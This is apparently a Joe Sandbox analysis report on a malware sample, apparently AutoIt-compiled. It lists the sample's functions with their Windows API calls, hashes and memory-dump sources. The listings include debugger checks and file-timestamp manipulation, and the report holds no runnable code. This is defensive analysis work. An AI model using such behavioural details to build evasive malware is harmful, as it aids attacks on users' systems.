Instruction ID: 2d8f2d2465842bc55dd70f6e6ff14a07131e3e8c4225593c1fb836c5882b7bf5
Opcode Fuzzy Hash: 45440eeaaa78547bee8115b41bc72ba87f86e9c9c04c676436c925d31036f3c4
Instruction Fuzzy Hash: 6C01C031241B36DEE6157B64F852E6A7248CF71738F14002AF4059A285DA719D818A74

Function 00D69B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00D697D2,?,?,?,?,?,00000004), ref: 00D69B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00D697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00D69B5B
CloseHandle.KERNEL32(00000000,?,00D697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D69B62

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 71ea3d75e676d5377133af071b6668f6653bfb925fb1e186cffb50f5aa893597
Instruction ID: a35b53771b2e63895cbd3c9db15834ca71b1f55dc1d73b5dd9e4b1e0d42789f0
Opcode Fuzzy Hash: 71ea3d75e676d5377133af071b6668f6653bfb925fb1e186cffb50f5aa893597
Instruction Fuzzy Hash: 62E08632580314B7D7212B54EC0DFCE7B18EB05761F144120FB14E91E0C7B1252197A8

Function 00D68F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D68FA5

Part of subcall function 00D22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00D29C64), ref: 00D22FA9
Part of subcall function 00D22F95: GetLastError.KERNEL32(00000000,?,00D29C64), ref: 00D22FBB

_free.LIBCMT ref: 00D68FB6
_free.LIBCMT ref: 00D68FC8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: b2124b34587ce65a407ec90ff6fe7bad02719365207ff4e12fcf04f8bd82db7e
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 5EE05BB170D7115BCA24A579BE41EA357FE9F8835471C091DB509DB142DF24FC419134

Function 00D0AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00D4002B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 36cca72366c2f0ad3a0e0249ec64293ef2701b2fed13a942a1f1370e0116e61e
Instruction ID: c5de1074273f01f1b4b39285442cafe6af2d6717337b18980eb4af5dc5a19197
Opcode Fuzzy Hash: 36cca72366c2f0ad3a0e0249ec64293ef2701b2fed13a942a1f1370e0116e61e
Instruction Fuzzy Hash: C2223874508351DFC724DF18C494B6ABBE1FF44314F19895DE89A8B2A2D731EC85CBA2

Function 00D04DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D04E1A

Strings

EA06, xrefs: 00D3DCF5

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 168813a607f2456c9e9ac3476cf1a2b8a4c4a5c5dde4bb9e5bc256cc15fb2c0d
Instruction ID: 1a72e75297688f408bbb297161e32501bbe62e7402a3223fa3244d47234c6a5a
Opcode Fuzzy Hash: 168813a607f2456c9e9ac3476cf1a2b8a4c4a5c5dde4bb9e5bc256cc15fb2c0d
Instruction Fuzzy Hash: 214158A1A041586BCF219B64D951FBF7FA6EF45300F2C4079FE8E9B2C6C6618D4487B1

Function 00D67A3D Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D67B65

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7f8939fc8a954f20dc3f0fde683cde043dd3fc3b495076185a2e6d8ee956c985
Instruction ID: 4eef58391b6bdcf40896bc9e2f8dc85c02920583bf03912bd7bb9360d83cd7c5
Opcode Fuzzy Hash: 7f8939fc8a954f20dc3f0fde683cde043dd3fc3b495076185a2e6d8ee956c985
Instruction Fuzzy Hash: D841857154820D9BDB20DFACE985E6EB7A8FF18308B284559E58997282EE71D9018B70

Function 00D0492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00D04992

Part of subcall function 00D235AC: __lock.LIBCMT ref: 00D235B2
Part of subcall function 00D235AC: DecodePointer.KERNEL32(00000001,?,00D049A7,00D581BC), ref: 00D235BE
Part of subcall function 00D235AC: EncodePointer.KERNEL32(?,?,00D049A7,00D581BC), ref: 00D235C9

Part of subcall function 00D04A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D04A73
Part of subcall function 00D04A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D04A88

Part of subcall function 00D03B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D03B7A
Part of subcall function 00D03B4C: IsDebuggerPresent.KERNEL32 ref: 00D03B8C
Part of subcall function 00D03B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00DC62F8,00DC62E0,?,?), ref: 00D03BFD
Part of subcall function 00D03B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00D03C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D049D2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 01c806753d2134944ef4e5f05beaa5168fa8f77d0b45bae2504b77b3b6fb8a79
Instruction ID: d4c7630fbf08f94b36402e0ce27a65479d57c0afdd96c625fd98e28fc836f471
Opcode Fuzzy Hash: 01c806753d2134944ef4e5f05beaa5168fa8f77d0b45bae2504b77b3b6fb8a79
Instruction Fuzzy Hash: 431138719183129BC700DF69EC45E0AFBE8EB94710F00451EF489C72A1DB709555CFB6

Function 00D05DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00D05981,?,?,?,?), ref: 00D05E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00D05981,?,?,?,?), ref: 00D3E19C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0d777257c464c6e6e328be2c1538055ac61c87f4e95829ee618a3c64fa53fa39
Instruction ID: 505fe5411b9437b7192f67e067830e5f30d201686bf10043b56691e24427372f
Opcode Fuzzy Hash: 0d777257c464c6e6e328be2c1538055ac61c87f4e95829ee618a3c64fa53fa39
Instruction Fuzzy Hash: F8019270244708BEF3645E24DC8AF673B9CEB01768F148318BEE95A1E0C6B05E458F60

Function 00D20FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D2594C: __FF_MSGBANNER.LIBCMT ref: 00D25963
Part of subcall function 00D2594C: __NMSG_WRITE.LIBCMT ref: 00D2596A
Part of subcall function 00D2594C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00D21013,?), ref: 00D2598F

std::exception::exception.LIBCMT ref: 00D2102C
__CxxThrowException@8.LIBCMT ref: 00D21041

Part of subcall function 00D287DB: RaiseException.KERNEL32(?,?,?,00DBBAF8,00000000,?,?,?,?,00D21046,?,00DBBAF8,?,00000001), ref: 00D28830

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b11aba96cf137d0d316eea7a22bd0cd342502f1eb3d148c2fde0fba3996fb47a
Instruction ID: f3ada91e889f4aaa287f7e0b24138e53056428d1a525d2e8e8d64f3419bd2a0b
Opcode Fuzzy Hash: b11aba96cf137d0d316eea7a22bd0cd342502f1eb3d148c2fde0fba3996fb47a
Instruction Fuzzy Hash: D1F0CD3950137DB6CB20BA54FD05AEF7BACDF30359F144425F80496691EFB18A8496F0

Function 00D2582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D2585C
__lock_file.LIBCMT ref: 00D2587D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5d59dce152196363173a047b556fb16d35e0d659be117114e837d7f8c825e80a
Instruction ID: cc16ce262b3ed510a6db546d6ea9dc62a84a78067734fb53285b22da0424586b
Opcode Fuzzy Hash: 5d59dce152196363173a047b556fb16d35e0d659be117114e837d7f8c825e80a
Instruction Fuzzy Hash: A4018871C01629EBCF21AF65BC01D9FBB61EF60364F144215B8145A1A5DB71C611EFB1

Function 00D255D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

__lock_file.LIBCMT ref: 00D2561B

Part of subcall function 00D26E4E: __lock.LIBCMT ref: 00D26E71

__fclose_nolock.LIBCMT ref: 00D25626

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 32aaaf87dc30c6101d58166278778a8b06a65c57dd69c1f3e67514260f2a7073
Instruction ID: 0a819186763250f0789e28ef93a8d6440b4343902e75392da09777f031ed1757
Opcode Fuzzy Hash: 32aaaf87dc30c6101d58166278778a8b06a65c57dd69c1f3e67514260f2a7073
Instruction Fuzzy Hash: 90F0F031801A309AD720AF74B802B6E67A1AF6133DF558209A451AB1C5CF7C8901AB75

Function 00D0F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca90c2864d6f8a2e38110343b123c16d5b61a2e9032073986b6c253c32528d3
Instruction ID: 1b84ee00636a58874f95efe79b3926e34a89fdd8b0dcc1782e7f8030208ff76b
Opcode Fuzzy Hash: 3ca90c2864d6f8a2e38110343b123c16d5b61a2e9032073986b6c253c32528d3
Instruction Fuzzy Hash: A8619E7060020A9FCB20DF54C995B6BB7F5EF44304F288479E94A97682E771ED51CBB1

Function 00D12123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cc03535ccaafff693ec55be11c075160c5bd7b22d0d29e9859e2ed08a45b7ae
Instruction ID: dc07fce209674092cfb535943c787a289e7ee57658ff16e476e67fed6e5fad54
Opcode Fuzzy Hash: 6cc03535ccaafff693ec55be11c075160c5bd7b22d0d29e9859e2ed08a45b7ae
Instruction Fuzzy Hash: BE517E34600604AFCF14EB64D996FAE77A5EF45310F188168F84AAB296CF31ED44CB75

Function 00B41070 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 00B408E0: GetFileAttributesW.KERNELBASE(?), ref: 00B408EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B4117B

Memory Dump Source

Source File: 00000000.00000002.1786018026.0000000000B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_N2sgk6jMa2.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: e37fb147ad56d56162801a8e08045d22b91cf28b3b88d0215e3c34dbb716f98d
Instruction ID: a022155448b337adf2e95726aad97300ce030c5430adf99ab4706eb72d2d6c95
Opcode Fuzzy Hash: e37fb147ad56d56162801a8e08045d22b91cf28b3b88d0215e3c34dbb716f98d
Instruction Fuzzy Hash: 21518131911218A6DF14EFB4D854BEF7379EF58300F1085A8FA09E7280EB759B48CBA1

Function 00D0766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D0774A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4f5eb73ce39962d0161a15c6d2463edf6175d50f893c861f1e66bc3f109d2f28
Instruction ID: 8339adc53468eb7b3768022809226c468bbe8928830735e997a710b9c98af1f8
Opcode Fuzzy Hash: 4f5eb73ce39962d0161a15c6d2463edf6175d50f893c861f1e66bc3f109d2f28
Instruction Fuzzy Hash: 24318279A08A12DFC7249F18D590A21F7A0FF48350B54C569E98E8F7E5E770E881CBA4

Function 00D05C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00D05CF6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7f5743fb5563783ed70127616a0a169fefc8e196cfb7919df34a8d5cf5d48fbf
Instruction ID: 69a799a75f42a24d720c5844226978cdb560aa6466c177ab9bd6ce2388283949
Opcode Fuzzy Hash: 7f5743fb5563783ed70127616a0a169fefc8e196cfb7919df34a8d5cf5d48fbf
Instruction Fuzzy Hash: C5314B31A00B09ABDB18DF29D48479EB7B5FF48310F18862ADC1997794D731A960DFA4

Function 00D400D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00D400E1

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2d999fff4764bfb6cc4414237c5e446a6fec0c510a0247e3a23362509566c16f
Instruction ID: 397f1a0e07a469d40fb22cf5a143f8981ddf07fe2dcd2bcd837e104bb5a377fb
Opcode Fuzzy Hash: 2d999fff4764bfb6cc4414237c5e446a6fec0c510a0247e3a23362509566c16f
Instruction Fuzzy Hash: D6410974508351CFDB14DF18C494B1ABBE0BF45318F19889CE9898B7A2C736EC45CB62

Function 00D04F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D04D13: FreeLibrary.KERNEL32(00000000,?), ref: 00D04D4D

Part of subcall function 00D2548B: __wfsopen.LIBCMT ref: 00D25496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00DC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D04F6F

Part of subcall function 00D04CC8: FreeLibrary.KERNEL32(00000000), ref: 00D04D02

Part of subcall function 00D04DD0: _memmove.LIBCMT ref: 00D04E1A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 9ae89b3af844d90625c24e20f11be459ef97fba19be50b1f0c32f77a188333cf
Instruction ID: 2c7dee4d57f95b13171f4e064e4fbd6fd480cf392f9fd34ec76da7facabae511
Opcode Fuzzy Hash: 9ae89b3af844d90625c24e20f11be459ef97fba19be50b1f0c32f77a188333cf
Instruction Fuzzy Hash: 9311E7B1600306ABCB10BF70EC12FAE77A9DF80711F108429FA49E62C1DA719A159B70

Function 00D401AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00D401BB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2de4c189d6c6703a8f954ecd7ace86ab4dac608f3ac42ec19d8fff2c3ff75d28
Instruction ID: 97a0c3bcb73bdf7996f04820e77340a7b9c4ced7cc03724180d71c813cc49b5e
Opcode Fuzzy Hash: 2de4c189d6c6703a8f954ecd7ace86ab4dac608f3ac42ec19d8fff2c3ff75d28
Instruction Fuzzy Hash: AA212474A08351DFCB14DF28C485B1ABBE0BF88314F098968F98A577A2D731F845CB62

Function 00D20941 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D209F4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LongNamePath
String ID:
